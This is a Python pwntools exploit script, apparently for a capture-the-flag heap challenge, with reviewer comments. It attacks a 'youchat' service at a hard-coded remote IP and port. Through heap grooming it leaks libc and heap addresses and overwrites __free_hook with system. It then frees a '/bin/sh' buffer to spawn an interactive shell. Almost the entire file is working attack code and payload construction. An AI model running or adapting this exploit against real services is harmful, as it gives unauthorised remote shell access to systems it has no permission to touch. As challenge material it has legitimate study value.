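from pwn import *

# Target selection.  The original spawned a local process and then
# immediately rebound `p` to the remote connection, so the child leaked and
# the LD_PRELOAD path was dead code.  Run `python exploit.py LOCAL` to debug
# against the local binary with the shipped libc; the default is the remote
# service.
LIBC_PATH = "./libc-2.27.so"
libc = ELF(LIBC_PATH)

if args.LOCAL:
    # NOTE(review): LD_PRELOAD-ing a foreign libc only works when the system
    # loader (ld.so) is compatible with it; otherwise the process crashes at
    # startup and the binary's interpreter has to be patched instead.
    p = process("./youchat", env={"LD_PRELOAD": LIBC_PATH})
else:
    p = remote("124.70.158.59", "30023")


def add(idx, size, name, password):
    """Menu 1: create user `idx` with a `size`-byte user-id buffer.

    `name` and `password` are sent with `send` (no trailing newline), as in
    the original -- presumably the service reads a fixed number of bytes, so
    a stray newline would end up inside the buffer.  Keep it that way.
    """
    p.recvuntil("Your choice: ")
    p.sendline("1")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
    p.recvuntil("How long is your user id: ")
    p.sendline(str(size))
    p.recvuntil("User name: ")
    p.send(name)
    p.recvuntil("Password: ")
    p.send(password)


def free(idx):
    """Menu 2: delete user `idx`."""
    p.recvuntil("Your choice: ")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline(str(idx))


def edit(idx, name):
    """Menu 3: overwrite user `idx`'s name.

    Unlike `add`, this uses `sendline`, so a trailing newline is part of the
    written data -- matches the original; the payloads below rely on it.
    """
    p.recvuntil("Your choice: ")
    p.sendline("3")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
    p.recvuntil("New username: ")
    p.sendline(name)


def show(idx):
    """Menu 4: print user `idx`; the caller parses the output for leaks."""
    p.recvuntil("Your choice: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline(str(idx))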
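# --- Stage 1: heap grooming -------------------------------------------------
# User 0 is the one whose buffer the later edit() payload is written into.
add(0, 0x100, 'a', 'a' * 0x10)

# Eight 0xf8-byte users freed newest-first.  The tcache bin for this size
# takes seven; the eighth free (user 1, not adjacent to top) goes to the
# unsorted bin, where its fd/bk are set to libc pointers.
for i in range(1, 0x9):
    add(i, 0xf8, 'a', 'a')
for i in range(0x8):
    free(0x8 - i)
# Drain the tcache again so the next 0xf8 request is served from the
# unsorted bin (the chunk still carrying the libc pointers).
for i in range(1, 0x8):
    add(i, 0xf8, 'a', 'a')
add(8, 0xf8, 'a' * 8, 'a')

# --- Stage 2: leaks ---------------------------------------------------------
# 'a'*8 overwrote fd; the six bytes printed after it are bk, still pointing
# into main_arena.  0x3EBCA0 is that pointer's offset in the shipped
# libc-2.27.so (presumably main_arena+96).  It is build-specific: a different
# libc build needs a different constant.
show(8)
p.recvuntil('a' * 8)
libc.address = u64(p.recv(6) + b'\x00\x00') - 0x3EBCA0
print(hex(libc.address))

# User 3's single-byte name 'a' (0x61) sits over the low byte of a stale
# heap pointer left in the buffer, hence the 0x...61 correction.  `heap` is
# not used below; kept for debugging only.  Layout-specific constant.
show(3)
p.recvuntil("Username: ")
heap = u64(p.recv(6) + b'\x00\x00') - 0x12461
print(hex(heap))

free_hook = libc.sym['__free_hook']
print(hex(free_hook))

# --- Stage 3: write __free_hook -----------------------------------------------
# Layout-specific payload (0x88 bytes): a 0x31 size field 0x68 bytes in,
# followed 0x18 bytes later by the address of __free_hook.  Presumably this
# rebuilds the header of an adjacent 0x30-sized chunk holding user 0's record
# and points its name pointer at __free_hook, so that the next edit(0) writes
# through it.  Confirm the offsets against the binary's record layout before
# reusing this against another build.
edit(0, p64(0) * 13 + p64(0x31) + p64(0) * 2 + p64(free_hook))
edit(0, p64(libc.sym['system']))

# free() on a user whose name is "/bin/sh" now calls __free_hook("/bin/sh"),
# i.e. system("/bin/sh").
add(0xf, 0xf8, '/bin/sh', 'a')
free(0xf)

# gdb.attach(p, 'b *$rebase(0x1876)')  # uncomment when debugging with LOCAL
p.interactive()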